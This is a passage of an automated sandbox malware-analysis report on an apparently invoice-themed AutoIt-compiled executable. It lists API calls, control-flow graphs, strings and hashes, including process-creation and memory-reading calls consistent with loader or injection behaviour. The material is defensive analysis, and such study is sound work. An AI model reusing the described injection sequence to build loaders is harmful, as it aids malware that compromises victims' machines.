                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                          • String ID: ,*H$4*H$@fI
                                                          • API String ID: 615853336-1459471987
                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2065 411a628-411a6d6 call 4118008 2068 411a6dd-411a703 call 411b538 CreateFileW 2065->2068 2071 411a705 2068->2071 2072 411a70a-411a71a 2068->2072 2073 411a855-411a859 2071->2073 2079 411a721-411a73b VirtualAlloc 2072->2079 2080 411a71c 2072->2080 2075 411a89b-411a89e 2073->2075 2076 411a85b-411a85f 2073->2076 2081 411a8a1-411a8a8 2075->2081 2077 411a861-411a864 2076->2077 2078 411a86b-411a86f 2076->2078 2077->2078 2082 411a871-411a87b 2078->2082 2083 411a87f-411a883 2078->2083 2084 411a742-411a759 ReadFile 2079->2084 2085 411a73d 2079->2085 2080->2073 2086 411a8aa-411a8b5 2081->2086 2087 411a8fd-411a912 2081->2087 2082->2083 2090 411a893 2083->2090 2091 411a885-411a88f 2083->2091 2092 411a760-411a7a0 VirtualAlloc 2084->2092 2093 411a75b 2084->2093 2085->2073 2094 411a8b7 2086->2094 2095 411a8b9-411a8c5 2086->2095 2088 411a922-411a92a 2087->2088 2089 411a914-411a91f VirtualFree 2087->2089 2089->2088 2090->2075 2091->2090 2096 411a7a2 2092->2096 2097 411a7a7-411a7c2 call 411b788 2092->2097 2093->2073 2094->2087 2098 411a8c7-411a8d7 2095->2098 2099 411a8d9-411a8e5 2095->2099 2096->2073 2105 411a7cd-411a7d7 2097->2105 2100 411a8fb 2098->2100 2101 411a8f2-411a8f8 2099->2101 2102 411a8e7-411a8f0 2099->2102 2100->2081 2101->2100 2102->2100 2106 411a7d9-411a808 call 411b788 2105->2106 2107 411a80a-411a81e call 411b598 2105->2107 2106->2105 2113 411a820 2107->2113 2114 411a822-411a826 2107->2114 2113->2073 2115 411a832-411a836 2114->2115 2116 411a828-411a82c CloseHandle 2114->2116 2117 411a846-411a84f 2115->2117 2118 411a838-411a843 VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0411A6F9
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0411A91F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1741008117.0000000004118000.00000040.00000020.00020000.00000000.sdmp, Offset: 04118000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4118000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                          • Instruction ID: 3dabdaf40eb27678aa704fbdd0d223aadcc3e92fd9cfcd1a79bd0b156480b96c
                                                          • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                          • Instruction Fuzzy Hash: E6A11A74E41209EBDB14CFA4C894BEEBBB5FF48305F2081A9E515BB290D775AA81CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                          APIs
                                                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                          • _wcsncpy.LIBCMT ref: 004102ED
                                                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                          • _wcsncpy.LIBCMT ref: 00410340
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                          • String ID: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                          • API String ID: 3170942423-809926646
                                                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2152 427393-4273b4 Shell_NotifyIconW 2148->2152 2153 427348-427369 Shell_NotifyIconW 2149->2153 2154 42736e-42738e Shell_NotifyIconW 2149->2154 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                                                          APIs
                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 3300667738-0
                                                          • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                          • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen
                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                          • API String ID: 1586453840-614718249
                                                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                          APIs
                                                            • Part of subcall function 0411A2A8: Sleep.KERNELBASE(000001F4), ref: 0411A2B9
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0411A512
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1741008117.0000000004118000.00000040.00000020.00020000.00000000.sdmp, Offset: 04118000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4118000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: X5V3E6YUO92TKNETGLA0ECW31J5E
                                                          • API String ID: 2694422964-1121607237
                                                          • Opcode ID: 483c257e4f6409ca34c94744ef010e43a7948af4f5129365353bb18fabc3edf8
                                                          • Instruction ID: 792aeb69e5ee7da01db8d35fa3e0b53a16806a1db58170df045f3850e5b80ae6
                                                          • Opcode Fuzzy Hash: 483c257e4f6409ca34c94744ef010e43a7948af4f5129365353bb18fabc3edf8
                                                          • Instruction Fuzzy Hash: CA617230D08288DAEF11DBA4D854BEEBF75AF15304F044199E2497B2C1D7BA1B49CBA5
                                                          APIs
                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                          • String ID: Line:
                                                          • API String ID: 1874344091-1585850449
                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Close$OpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 1607946009-824357125
                                                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 04119A63
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04119AF9
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04119B1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1741008117.0000000004118000.00000040.00000020.00020000.00000000.sdmp, Offset: 04118000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4118000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                          • Instruction ID: f7ebadde441e2c862f0dfaeb4bc26f3bf060a929fcd943f4bc6dc6b943b36809
                                                          • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                          • Instruction Fuzzy Hash: F9620E70A14258DBEB24CFA4C890BDEB376EF58700F1091A9D11DEB3A0E7759E81CB59
                                                          APIs
                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                          • _free.LIBCMT ref: 004295A0
                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                          • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                          • API String ID: 3938964917-2282867301
                                                          • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                          • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: Error:
                                                          • API String ID: 4104443479-232661952
                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                          APIs
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,0040F545,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,004A90E8,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,?,0040F545), ref: 0041013C
                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                          • String ID: X$pWH
                                                          • API String ID: 85490731-941433119
                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                          Strings
                                                          • C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe, xrefs: 00410107
                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _strcat
